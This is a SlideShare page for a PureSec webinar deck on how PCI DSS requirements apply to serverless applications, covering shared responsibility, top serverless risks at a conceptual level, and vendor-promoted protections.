SlideShare a Scribd company logo

PCI & Serverless - Everything you need to know

Download as PPTX, PDF
PureSec
PureSec

Compliance is a major driver for many of today's cybersecurity technologies, methods, and best practices. But how does it work in the serverless world? Join us to learn everything you need to know about how PCI Compliance applies to serverless architectures. This Webinar Covers: Top serverless security risks How the shared responsibility model applies to serverless PCI DSS applicability to FaaS/Serverless PCI requirements and their consequences for serverless apps How to prepare your serverless architecture for PCI compliance

1 of 24
PCICompliance& Serverless: EverythingYouNeed To Know Ory Segal (CTO), Ron Harnik (Head of Marketing)
Agenda  Serverless in a nutshell  The Shared Model of Responsibility  Serverless AppSec: The Times They Are a-Changin’  PCI DSS Applicability to Serverless  PCI DSS / Serverless: Challenges
Why Serverless?
Compute as a Utility
Serverless Benefits No servers to manage Continuousscaling Sub-second metering Less security responsibilities
EVENT TRIGGER DEPLOY EVENT SOURCES … INTERACTIONS REST API CLOUD RESOURCES CODE CODE REPOSITORY EVENT SOURCES CLOUD RESOURCES OUTPUT SERVERLESS (OVER) SIMPLIFIED FUNCTION {;}
Shared Model Of Responsibility CLOUDPROVIDER RESPONSIBLE FOR SECURITY “OF” THE CLOUD REGIONS AVAILABILITY ZONES EDGE LOCATIONS COMPUTE STORAGE DATABASE NETWORK OPERATING SYSTEM + VIRTUAL MACHINES+ CONTAINERS APPLICATIONOWNER RESPONSIBLE FOR SECURITY “IN” THECLOUD APPLICATIONS(FUNCTIONS) IDENTITY & ACCESS MANAGEMENT CLOUD SERVICES CONFIGURATION CLIENT-SIDE DATA INCLOUD DATA INTRANSIT
Security Responsibility: WhenYou Own The Infrastructure(IaaS)  Physicalinfrastructure,access restrictionstophysicalperimeterandhardware  Secureconfigurationofinfrastructuredevicesandsystems  Regularlytestingthesecurityofallsystems/processes(OS, services)  Identificationandauthenticationofaccess tosystems(OS,services)  PatchingandfixingflawsinOS  HardeningOS andservices  Protectingallsystemsagainstmalwareandbackdoors  Patchingandfixingflawsinruntimeenvironmentandrelatedsoftwarepackages  Exploitpreventionandmemoryprotection  Networksegmentation  Trackingandmonitoringallnetworkresourcesandaccess  Installationandmaintenanceofnetworkfirewalls  Network-layerDoSprotection  Authenticationofusers  Authorizationcontrolswhenaccessing applicationanddata  Log andmaintainaudittrailsofallaccess toapplicationanddata  Deployanapplicationlayerfirewallforevent-datainspection  Detectandfixvulnerabilitiesinthird-partydependencies  Useleast-privilegedIAMrolesandpermissions  Enforcelegitimateapplicationbehavior  Data leakprevention  Scan codeandconfigurationsstaticallyduringdevelopment  Maintainserverless/cloudassetinventory  Removeobsolete/unusedcloudservicesandfunctions  Continuouslymonitorerrorsandsecurityincidents 8% 92% APPLICATIONOWNER CLOUD PROVIDER http://bit.ly/faas-vs-iaas
Security Responsibility: WhenYou Adopt Serverless  Physicalinfrastructure,access restrictionstophysicalperimeterandhardware  Secureconfigurationofinfrastructuredevicesandsystems  Regularlytestingthesecurityofallsystems/processes(OS, services)  Identificationandauthenticationofaccess tosystems(OS,services)  PatchingandfixingflawsinOS  HardeningOS andservices  Protectingallsystemsagainstmalwareandbackdoors  Patchingandfixingflawsinruntimeenvironmentandrelatedsoftwarepackages  Exploitpreventionandmemoryprotection  Networksegmentation  Trackingandmonitoringallnetworkresourcesandaccess  Installationandmaintenanceofnetworkfirewalls  Network-layerDoSprotection  Authenticationofusers  Authorizationcontrolswhenaccessing applicationanddata  Log andmaintainaudittrailsofallaccess toapplicationanddata  Deployanapplicationlayerfirewallforevent-datainspection  Detectandfixvulnerabilitiesinthird-partydependencies  Useleast-privilegedIAMrolesandpermissions  Enforcelegitimateapplicationbehavior  Data leakprevention  Scan codeandconfigurationsstaticallyduringdevelopment  Maintainserverless/cloudassetinventory  Removeobsolete/unusedcloudservicesandfunctions  Continuouslymonitorerrorsandsecurityincidents 52% 48% APPLICATIONOWNER CLOUD PROVIDER
TopRisks for Serverless Applications http://bit.ly/csa-top-12 SAS-1 Function event-data injection Broken authentication SAS-2 Insecure serverless deployment SAS-3 Over-privileged function permissions SAS-4 Inadequate function monitoring SAS-5 Insecure 3rd partydependencies SAS-6 Insecure app secrets storage SAS-7 DoS&Financial exhaustion SAS-8 Serverless business logic manipulation SAS-9 Improper exceptions handling &errors SAS-10 Legacy functions & cloud resources SAS-11 Cross-execution data persistency SAS-12
The Need For Serverless-Native Protection Protects applications by being deployed on networks and servers TRADITIONALSECURITY Theapplication owner doesn't have any control over the infrastructure SERVERLESS
INFRASTRUCTURE SERVERLESS FUNCTIONS WAF LAYER 7 NG-FW INBOUND WSG OUTBOUND IPS NETWORK EPP BEHAVIORAL APPLICATION TraditionalProtectionsCannotBe Deployed On Serverless
Wait… DoesPCIDSS Even Applyto ServerlessApps?
PCI DSS Applicabilityto FaaS/ Serverless  PCI DSS requirements & assessment procedures are stillvery much relevant to applications built on public-cloud FaaS  Public-cloud FaaS surfaces certain technicalchallenges related to the ability of organizations to comply using existingapproaches  “PCI SSC Cloud Computing Guidelines” sheds light on the challengesand technicallimitations of existing solutions, however doesn’t explicitlydiscuss FaaS (Only IaaS, PaaS, SaaS)
Serverless & PCI: Where to Start? https://www.pcisecuritystandards.org/pdfs/PCI_SSC_Cloud_Guidelines_v3.pdf “Use of a PCIDSS compliant Provider does not automatically result in PCIDSS compliance for theCustomers” ⚠️ “Even where a cloud service is validated for certain PCI DSSrequirements, this validation does not automatically transfer to the Customer environments within that cloud service” ⚠️ This guidance is intended for organizations using, or thinkingof using, providing or assessing cloud technologies. It provides guidance on the useof cloud technologies and considerations for maintainingsecurity controls incloud environments
Requirement 1
Challenge #1: Network Access vs. API Access  In FaaS, the network is abstracted and is nolonger relevantto customers  Network traffic is replaced byapplication layer APIs + cloudAPIs  Access is controlled by IAM permissions  Inbound traffic, is mostly replacedby cloud eventsource triggers  Outbound traffic from theserverless runtime still possible “AswebservicesandAPIsarebynaturepubliclyaccessible, theirsecurityiscriticalto thesecurityoftheresourcesto whichtheyprovideaccess. Ifnot properlydeveloped, managedandsecured, theseinterfacescanbeexploited orcompromised, resultinginunexpectedbehavior andpotentially unauthorizedaccess” (PCISSCCloudComputingGuidelines) Since Firewalls/routers cannot bedeployed by customers of public-cloud FaaS, there aretechnical challenges for requirements: 1.2.1(Restrict inboundandoutboundtraffic…) , 1.3.4(Donotallowunauthorizedoutboundtraffic)
Requirements 5 & 6
Challenge #2: User Access Goes Beyond HTTP/Web  Serverless provides a rich set of cloud-native event inputs (dozens). Webtraffic is not the most common event source  Files are less relevant as a malware vector, otherinputs may still behave as malware  WAFs provide incomplete security protection  SAST solutions are ineffective (logic spans over functions, events and cloud services). Also doesn’t scan Infrastructure-as-code and IAM permissions  Already-deployed functions also require scanning for vulnerabilities (SCA)  DAST is ineffective for non-web events Technicalchallengesfor requirements: 5(Protect allsystems against malware), 5.1,6(Develop andmaintainsecuresystems &applications), 6.2 (Ensurethatallsystem componentsandsoftware areprotected fromknownvulnerabilities), 6.6(Manualorautomatedapplication vulnerability securityassessment tools, automatedtechnicalsolution thatdetects andprevents web-based attacks -forexample,a WAF)
FUNCTION {;} Direct Invoke (24%) Queues & Streams (21%) API Gateway (14%) File Storage (13%) Notifications (13%) Logs (12%) Database (4%) … … … 37 other sources WAF SERVERLESS APPLICATION INPUTS (EVENTS) Estimation based on https://www.slideshare.net/ChrisMunns/serverless-is- dead-132954772
Back to the Drawing Board
FaaSapplicationsrequire a different securityapproach  The approach must be Serverless-centric, and should include the following:  Serverless oriented security testing:  Abilitytoscan Infrastructure-as-code& IAM roles, permissions,cloudservice config.  Abilitytodetect knownvulnerabilitiesin OSSpackagesofdeployedfunctions  Serverless-native application firewall:  Capableofdetecting & preventing attacksvia all cloud-nativeevent sourcetriggers  Canscale andprovideappsecurityforconcurrentexecutionsacrossregions  Serverless dedicated behavioral protection:  Capableofpreventing unwantedbehaviorandmalicious processes  Canenforcestrictaccesspermissions toprevent unauthorizedcloudAPI access  Canblockoutboundtrafficanddataleakage tothe Internetorothercloud accounts
Puresec SSP: SERVERLESS POSTURE MANAGEMENT RUNTIME PROTECTION SECURITY VISIBILITY SERVERLESS ASSET INVENTORY VULNERABILITY MANAGEMENT DETECT IAM & CONFIGURATION ISSUES CI / CD INTEGRATION SERVERLESS APPLICATION FIREWALL BEHAVIORAL PROTECTION W/ ML BLAZING FAST PAINLESS DEPLOYMENT REAL TIME APP SECURITY VISIBLITY DEEP FORENSIC ANALYSIS SIEM INTEGRATIONS © 2019 PURESEC
How Can PureSec Fill YourPCI DSS Gaps? Requirement Challenge Solution REQUIREMENT 1 • Cannot deploy firewalls & routers • Inbound traffic is now event triggers • Cannot prevent outbound traffic • Least privileged IAM permissions (who can invoke?) – via automated static scanning • Block unauthorized outbound traffic through Behavioral protection REQUIREMENT 5 • Cannot deploy anti-malware and endpoint prevention • Enforce known good behavior and prevent malicious actions through Behavioral protection • Block attempts to inject code through Serverless App Firewall REQUIREMENT 6 • SAST alone is ineffective • SAST doesn’t cover deployed assets • DAST is ineffective • WAF provides extremely partial coverage • Automated scanning of Serverless code, configuration, IAM, and OSS • Full coverage over all event source types with Serverless App Firewall

Recommended

Effective API Governance: Lessons Learnt
Effective API Governance: Lessons LearntEffective API Governance: Lessons Learnt
Effective API Governance: Lessons Learnt
Pronovix
 
Pave the Golden Path On Your Internal Platform
Pave the Golden Path On Your Internal PlatformPave the Golden Path On Your Internal Platform
Pave the Golden Path On Your Internal Platform
Mauricio (Salaboy) Salatino
 
Using Google Compute Engine
Using Google Compute EngineUsing Google Compute Engine
Using Google Compute Engine
Lynn Langit
 
Kubernetes vs App Service
Kubernetes vs App ServiceKubernetes vs App Service
Kubernetes vs App Service
Lorenzo Barbieri
 
Kubernetes #4 volume & stateful set
Kubernetes #4 volume & stateful setKubernetes #4 volume & stateful set
Kubernetes #4 volume & stateful set
Terry Cho
 
CI/CD on AWS
CI/CD on AWSCI/CD on AWS
CI/CD on AWS
Amazon Web Services
 
Serverless Framework Intro
Serverless Framework IntroServerless Framework Intro
Serverless Framework Intro
Nikolaus Graf
 
AWS API Gateway
AWS API GatewayAWS API Gateway
AWS API Gateway
Muhammed YALÇIN
 

Recommended

Effective API Governance: Lessons Learnt
Effective API Governance: Lessons LearntEffective API Governance: Lessons Learnt
Effective API Governance: Lessons Learnt
Pronovix
 
Pave the Golden Path On Your Internal Platform
Pave the Golden Path On Your Internal PlatformPave the Golden Path On Your Internal Platform
Pave the Golden Path On Your Internal Platform
Mauricio (Salaboy) Salatino
 
Using Google Compute Engine
Using Google Compute EngineUsing Google Compute Engine
Using Google Compute Engine
Lynn Langit
 
Kubernetes vs App Service
Kubernetes vs App ServiceKubernetes vs App Service
Kubernetes vs App Service
Lorenzo Barbieri
 
Kubernetes #4 volume & stateful set
Kubernetes #4 volume & stateful setKubernetes #4 volume & stateful set
Kubernetes #4 volume & stateful set
Terry Cho
 
CI/CD on AWS
CI/CD on AWSCI/CD on AWS
CI/CD on AWS
Amazon Web Services
 
Serverless Framework Intro
Serverless Framework IntroServerless Framework Intro
Serverless Framework Intro
Nikolaus Graf
 
AWS API Gateway
AWS API GatewayAWS API Gateway
AWS API Gateway
Muhammed YALÇIN
 
AWS Security Week: AWS Secrets Manager
AWS Security Week: AWS Secrets ManagerAWS Security Week: AWS Secrets Manager
AWS Security Week: AWS Secrets Manager
Amazon Web Services
 
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon
 
Serverless Architectures.pdf
Serverless Architectures.pdfServerless Architectures.pdf
Serverless Architectures.pdf
Amazon Web Services
 
Amazon API Gateway
Amazon API GatewayAmazon API Gateway
Amazon API Gateway
Amazon Web Services
 
Azure web apps
Azure web appsAzure web apps
Azure web apps
Vaibhav Gujral
 
Deep Dive on Serverless Stack
Deep Dive on Serverless StackDeep Dive on Serverless Stack
Deep Dive on Serverless Stack
Amazon Web Services
 
SOLID Design Principles
SOLID Design PrinciplesSOLID Design Principles
SOLID Design Principles
Samuel Breed
 
Serverless 개발에서의 인증 완벽 가이드::박선용::AWS Summit Seoul 2018
Serverless 개발에서의 인증 완벽 가이드::박선용::AWS Summit Seoul 2018Serverless 개발에서의 인증 완벽 가이드::박선용::AWS Summit Seoul 2018
Serverless 개발에서의 인증 완벽 가이드::박선용::AWS Summit Seoul 2018
Amazon Web Services Korea
 
Microservices with Java, Spring Boot and Spring Cloud
Microservices with Java, Spring Boot and Spring CloudMicroservices with Java, Spring Boot and Spring Cloud
Microservices with Java, Spring Boot and Spring Cloud
Eberhard Wolff
 
Default GitLab CI Pipeline - Auto DevOps
Default GitLab CI Pipeline - Auto DevOpsDefault GitLab CI Pipeline - Auto DevOps
Default GitLab CI Pipeline - Auto DevOps
Rajith Bhanuka Mahanama
 
Understanding REST APIs in 5 Simple Steps
Understanding REST APIs in 5 Simple StepsUnderstanding REST APIs in 5 Simple Steps
Understanding REST APIs in 5 Simple Steps
Tessa Mero
 
Serverless Architecture
Serverless ArchitectureServerless Architecture
Serverless Architecture
Elana Krasner
 
Automating Security in your IaC Pipeline
Automating Security in your IaC PipelineAutomating Security in your IaC Pipeline
Automating Security in your IaC Pipeline
Amazon Web Services
 
Introduction to Spring Framework
Introduction to Spring Framework Introduction to Spring Framework
Introduction to Spring Framework
Serhat Can
 
Chef Tutorial | Chef Tutorial For Beginners | DevOps Chef Tutorial | DevOps T...
Chef Tutorial | Chef Tutorial For Beginners | DevOps Chef Tutorial | DevOps T...Chef Tutorial | Chef Tutorial For Beginners | DevOps Chef Tutorial | DevOps T...
Chef Tutorial | Chef Tutorial For Beginners | DevOps Chef Tutorial | DevOps T...
Simplilearn
 
Kubernetes presentation
Kubernetes presentationKubernetes presentation
Kubernetes presentation
GauranG Bajpai
 
Introduction to Serverless
Introduction to ServerlessIntroduction to Serverless
Introduction to Serverless
Amazon Web Services
 
Intro to Azure Api Management - With Cats
Intro to Azure Api Management - With CatsIntro to Azure Api Management - With Cats
Intro to Azure Api Management - With Cats
Xamariners
 
Convert Your Code into a Microservice using AWS Lambda
Convert Your Code into a Microservice using AWS LambdaConvert Your Code into a Microservice using AWS Lambda
Convert Your Code into a Microservice using AWS Lambda
Amazon Web Services
 
GitOps 101 Presentation.pdf
GitOps 101 Presentation.pdfGitOps 101 Presentation.pdf
GitOps 101 Presentation.pdf
ssuser31375f
 
Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)
Deivid Toledo
 
Discussing strategies for building the next gen data centre
Discussing strategies for building the next gen data centreDiscussing strategies for building the next gen data centre
Discussing strategies for building the next gen data centre
ICT-Partners
 

More Related Content

What's hot

AWS Security Week: AWS Secrets Manager
AWS Security Week: AWS Secrets ManagerAWS Security Week: AWS Secrets Manager
AWS Security Week: AWS Secrets Manager
Amazon Web Services
 
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon
 
Serverless Architectures.pdf
Serverless Architectures.pdfServerless Architectures.pdf
Serverless Architectures.pdf
Amazon Web Services
 
Amazon API Gateway
Amazon API GatewayAmazon API Gateway
Amazon API Gateway
Amazon Web Services
 
Azure web apps
Azure web appsAzure web apps
Azure web apps
Vaibhav Gujral
 
Deep Dive on Serverless Stack
Deep Dive on Serverless StackDeep Dive on Serverless Stack
Deep Dive on Serverless Stack
Amazon Web Services
 
SOLID Design Principles
SOLID Design PrinciplesSOLID Design Principles
SOLID Design Principles
Samuel Breed
 
Serverless 개발에서의 인증 완벽 가이드::박선용::AWS Summit Seoul 2018
Serverless 개발에서의 인증 완벽 가이드::박선용::AWS Summit Seoul 2018Serverless 개발에서의 인증 완벽 가이드::박선용::AWS Summit Seoul 2018
Serverless 개발에서의 인증 완벽 가이드::박선용::AWS Summit Seoul 2018
Amazon Web Services Korea
 
Microservices with Java, Spring Boot and Spring Cloud
Microservices with Java, Spring Boot and Spring CloudMicroservices with Java, Spring Boot and Spring Cloud
Microservices with Java, Spring Boot and Spring Cloud
Eberhard Wolff
 
Default GitLab CI Pipeline - Auto DevOps
Default GitLab CI Pipeline - Auto DevOpsDefault GitLab CI Pipeline - Auto DevOps
Default GitLab CI Pipeline - Auto DevOps
Rajith Bhanuka Mahanama
 
Understanding REST APIs in 5 Simple Steps
Understanding REST APIs in 5 Simple StepsUnderstanding REST APIs in 5 Simple Steps
Understanding REST APIs in 5 Simple Steps
Tessa Mero
 
Serverless Architecture
Serverless ArchitectureServerless Architecture
Serverless Architecture
Elana Krasner
 
Automating Security in your IaC Pipeline
Automating Security in your IaC PipelineAutomating Security in your IaC Pipeline
Automating Security in your IaC Pipeline
Amazon Web Services
 
Introduction to Spring Framework
Introduction to Spring Framework Introduction to Spring Framework
Introduction to Spring Framework
Serhat Can
 
Chef Tutorial | Chef Tutorial For Beginners | DevOps Chef Tutorial | DevOps T...
Chef Tutorial | Chef Tutorial For Beginners | DevOps Chef Tutorial | DevOps T...Chef Tutorial | Chef Tutorial For Beginners | DevOps Chef Tutorial | DevOps T...
Chef Tutorial | Chef Tutorial For Beginners | DevOps Chef Tutorial | DevOps T...
Simplilearn
 
Kubernetes presentation
Kubernetes presentationKubernetes presentation
Kubernetes presentation
GauranG Bajpai
 
Introduction to Serverless
Introduction to ServerlessIntroduction to Serverless
Introduction to Serverless
Amazon Web Services
 
Intro to Azure Api Management - With Cats
Intro to Azure Api Management - With CatsIntro to Azure Api Management - With Cats
Intro to Azure Api Management - With Cats
Xamariners
 
Convert Your Code into a Microservice using AWS Lambda
Convert Your Code into a Microservice using AWS LambdaConvert Your Code into a Microservice using AWS Lambda
Convert Your Code into a Microservice using AWS Lambda
Amazon Web Services
 
GitOps 101 Presentation.pdf
GitOps 101 Presentation.pdfGitOps 101 Presentation.pdf
GitOps 101 Presentation.pdf
ssuser31375f
 

What's hot (20)

AWS Security Week: AWS Secrets Manager
AWS Security Week: AWS Secrets ManagerAWS Security Week: AWS Secrets Manager
AWS Security Week: AWS Secrets Manager
 
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
 
Serverless Architectures.pdf
Serverless Architectures.pdfServerless Architectures.pdf
Serverless Architectures.pdf
 
Amazon API Gateway
Amazon API GatewayAmazon API Gateway
Amazon API Gateway
 
Azure web apps
Azure web appsAzure web apps
Azure web apps
 
Deep Dive on Serverless Stack
Deep Dive on Serverless StackDeep Dive on Serverless Stack
Deep Dive on Serverless Stack
 
SOLID Design Principles
SOLID Design PrinciplesSOLID Design Principles
SOLID Design Principles
 
Serverless 개발에서의 인증 완벽 가이드::박선용::AWS Summit Seoul 2018
Serverless 개발에서의 인증 완벽 가이드::박선용::AWS Summit Seoul 2018Serverless 개발에서의 인증 완벽 가이드::박선용::AWS Summit Seoul 2018
Serverless 개발에서의 인증 완벽 가이드::박선용::AWS Summit Seoul 2018
 
Microservices with Java, Spring Boot and Spring Cloud
Microservices with Java, Spring Boot and Spring CloudMicroservices with Java, Spring Boot and Spring Cloud
Microservices with Java, Spring Boot and Spring Cloud
 
Default GitLab CI Pipeline - Auto DevOps
Default GitLab CI Pipeline - Auto DevOpsDefault GitLab CI Pipeline - Auto DevOps
Default GitLab CI Pipeline - Auto DevOps
 
Understanding REST APIs in 5 Simple Steps
Understanding REST APIs in 5 Simple StepsUnderstanding REST APIs in 5 Simple Steps
Understanding REST APIs in 5 Simple Steps
 
Serverless Architecture
Serverless ArchitectureServerless Architecture
Serverless Architecture
 
Automating Security in your IaC Pipeline
Automating Security in your IaC PipelineAutomating Security in your IaC Pipeline
Automating Security in your IaC Pipeline
 
Introduction to Spring Framework
Introduction to Spring Framework Introduction to Spring Framework
Introduction to Spring Framework
 
Chef Tutorial | Chef Tutorial For Beginners | DevOps Chef Tutorial | DevOps T...
Chef Tutorial | Chef Tutorial For Beginners | DevOps Chef Tutorial | DevOps T...Chef Tutorial | Chef Tutorial For Beginners | DevOps Chef Tutorial | DevOps T...
Chef Tutorial | Chef Tutorial For Beginners | DevOps Chef Tutorial | DevOps T...
 
Kubernetes presentation
Kubernetes presentationKubernetes presentation
Kubernetes presentation
 
Introduction to Serverless
Introduction to ServerlessIntroduction to Serverless
Introduction to Serverless
 
Intro to Azure Api Management - With Cats
Intro to Azure Api Management - With CatsIntro to Azure Api Management - With Cats
Intro to Azure Api Management - With Cats
 
Convert Your Code into a Microservice using AWS Lambda
Convert Your Code into a Microservice using AWS LambdaConvert Your Code into a Microservice using AWS Lambda
Convert Your Code into a Microservice using AWS Lambda
 
GitOps 101 Presentation.pdf
GitOps 101 Presentation.pdfGitOps 101 Presentation.pdf
GitOps 101 Presentation.pdf
 

Similar to PCI & Serverless - Everything you need to know

Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)
Deivid Toledo
 
Discussing strategies for building the next gen data centre
Discussing strategies for building the next gen data centreDiscussing strategies for building the next gen data centre
Discussing strategies for building the next gen data centre
ICT-Partners
 
Cloud computing
Cloud computingCloud computing
Cloud computing
bhaskararaomacherla
 
VMworld 2013: VMware Compliance Reference Architecture Framework Overview
VMworld 2013: VMware Compliance Reference Architecture Framework Overview VMworld 2013: VMware Compliance Reference Architecture Framework Overview
VMworld 2013: VMware Compliance Reference Architecture Framework Overview
VMworld
 
edgescan vulnerability stats report (2018)
edgescan vulnerability stats report (2018) edgescan vulnerability stats report (2018)
edgescan vulnerability stats report (2018)
Eoin Keary
 
Top challenges in cloud computing
Top challenges in cloud computingTop challenges in cloud computing
Top challenges in cloud computing
TISEE
 
Mashing Up Manufacturing
Mashing Up ManufacturingMashing Up Manufacturing
Mashing Up Manufacturing
Dominique Guinard
 
Fantastic Beasts (aka Cloud Audit Issues) and Where to Find Them
Fantastic Beasts (aka Cloud Audit Issues) and Where to Find ThemFantastic Beasts (aka Cloud Audit Issues) and Where to Find Them
Fantastic Beasts (aka Cloud Audit Issues) and Where to Find Them
Suvabrata Sinha
 
Cloud Computing and its Services
Cloud Computing and its ServicesCloud Computing and its Services
Cloud Computing and its Services
muneeb hassan
 
Cloud Security Alliance's GRC Stack Overview
Cloud Security Alliance's GRC Stack OverviewCloud Security Alliance's GRC Stack Overview
Cloud Security Alliance's GRC Stack Overview
Valdez Ladd MBA, CISSP, CISA,
 
Power Struggle: Balancing Relationships & Responsibility in the Cloud
Power Struggle: Balancing Relationships & Responsibility in the CloudPower Struggle: Balancing Relationships & Responsibility in the Cloud
Power Struggle: Balancing Relationships & Responsibility in the Cloud
Mark Nunnikhoven
 
CSC AWS re:Invent Enterprise DevOps session
CSC AWS re:Invent Enterprise DevOps sessionCSC AWS re:Invent Enterprise DevOps session
CSC AWS re:Invent Enterprise DevOps session
Tom Laszewski
 
Ampi vmware
Ampi vmwareAmpi vmware
Ampi vmware
anapelizondo
 
Brighttalk Challenges In Cloud Security
Brighttalk Challenges In Cloud SecurityBrighttalk Challenges In Cloud Security
Brighttalk Challenges In Cloud Security
guestc416cd26
 
Security concerns with SaaS layer of cloud computing
Security concerns with SaaS layer of cloud computingSecurity concerns with SaaS layer of cloud computing
Security concerns with SaaS layer of cloud computing
Clinton DSouza
 
(ENT210) Accelerating Business Innovation with DevOps on AWS | AWS re:Invent ...
(ENT210) Accelerating Business Innovation with DevOps on AWS | AWS re:Invent ...(ENT210) Accelerating Business Innovation with DevOps on AWS | AWS re:Invent ...
(ENT210) Accelerating Business Innovation with DevOps on AWS | AWS re:Invent ...
Amazon Web Services
 
Cloud Computing and Virtualisation
Cloud Computing and VirtualisationCloud Computing and Virtualisation
Cloud Computing and Virtualisation
anupriti
 
Citrix - Open Elastic Platform for the Private Cloud
Citrix - Open Elastic Platform for the Private CloudCitrix - Open Elastic Platform for the Private Cloud
Citrix - Open Elastic Platform for the Private Cloud
Nati Shalom
 
Securing Your Public Cloud Infrastructure
Securing Your Public Cloud InfrastructureSecuring Your Public Cloud Infrastructure
Securing Your Public Cloud Infrastructure
Qualys
 
AWS Webcast - Top 3 Ways to Improve Web App Security
AWS Webcast - Top 3 Ways to Improve Web App SecurityAWS Webcast - Top 3 Ways to Improve Web App Security
AWS Webcast - Top 3 Ways to Improve Web App Security
Amazon Web Services
 

Similar to PCI & Serverless - Everything you need to know (20)

Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)
 
Discussing strategies for building the next gen data centre
Discussing strategies for building the next gen data centreDiscussing strategies for building the next gen data centre
Discussing strategies for building the next gen data centre
 
Cloud computing
Cloud computingCloud computing
Cloud computing
 
VMworld 2013: VMware Compliance Reference Architecture Framework Overview
VMworld 2013: VMware Compliance Reference Architecture Framework Overview VMworld 2013: VMware Compliance Reference Architecture Framework Overview
VMworld 2013: VMware Compliance Reference Architecture Framework Overview
 
edgescan vulnerability stats report (2018)
edgescan vulnerability stats report (2018) edgescan vulnerability stats report (2018)
edgescan vulnerability stats report (2018)
 
Top challenges in cloud computing
Top challenges in cloud computingTop challenges in cloud computing
Top challenges in cloud computing
 
Mashing Up Manufacturing
Mashing Up ManufacturingMashing Up Manufacturing
Mashing Up Manufacturing
 
Fantastic Beasts (aka Cloud Audit Issues) and Where to Find Them
Fantastic Beasts (aka Cloud Audit Issues) and Where to Find ThemFantastic Beasts (aka Cloud Audit Issues) and Where to Find Them
Fantastic Beasts (aka Cloud Audit Issues) and Where to Find Them
 
Cloud Computing and its Services
Cloud Computing and its ServicesCloud Computing and its Services
Cloud Computing and its Services
 
Cloud Security Alliance's GRC Stack Overview
Cloud Security Alliance's GRC Stack OverviewCloud Security Alliance's GRC Stack Overview
Cloud Security Alliance's GRC Stack Overview
 
Power Struggle: Balancing Relationships & Responsibility in the Cloud
Power Struggle: Balancing Relationships & Responsibility in the CloudPower Struggle: Balancing Relationships & Responsibility in the Cloud
Power Struggle: Balancing Relationships & Responsibility in the Cloud
 
CSC AWS re:Invent Enterprise DevOps session
CSC AWS re:Invent Enterprise DevOps sessionCSC AWS re:Invent Enterprise DevOps session
CSC AWS re:Invent Enterprise DevOps session
 
Ampi vmware
Ampi vmwareAmpi vmware
Ampi vmware
 
Brighttalk Challenges In Cloud Security
Brighttalk Challenges In Cloud SecurityBrighttalk Challenges In Cloud Security
Brighttalk Challenges In Cloud Security
 
Security concerns with SaaS layer of cloud computing
Security concerns with SaaS layer of cloud computingSecurity concerns with SaaS layer of cloud computing
Security concerns with SaaS layer of cloud computing
 
(ENT210) Accelerating Business Innovation with DevOps on AWS | AWS re:Invent ...
(ENT210) Accelerating Business Innovation with DevOps on AWS | AWS re:Invent ...(ENT210) Accelerating Business Innovation with DevOps on AWS | AWS re:Invent ...
(ENT210) Accelerating Business Innovation with DevOps on AWS | AWS re:Invent ...
 
Cloud Computing and Virtualisation
Cloud Computing and VirtualisationCloud Computing and Virtualisation
Cloud Computing and Virtualisation
 
Citrix - Open Elastic Platform for the Private Cloud
Citrix - Open Elastic Platform for the Private CloudCitrix - Open Elastic Platform for the Private Cloud
Citrix - Open Elastic Platform for the Private Cloud
 
Securing Your Public Cloud Infrastructure
Securing Your Public Cloud InfrastructureSecuring Your Public Cloud Infrastructure
Securing Your Public Cloud Infrastructure
 
AWS Webcast - Top 3 Ways to Improve Web App Security
AWS Webcast - Top 3 Ways to Improve Web App SecurityAWS Webcast - Top 3 Ways to Improve Web App Security
AWS Webcast - Top 3 Ways to Improve Web App Security
 

Recently uploaded

Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
Claudio Di Ciccio
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
Mariano Tinti
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
Neo4j
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
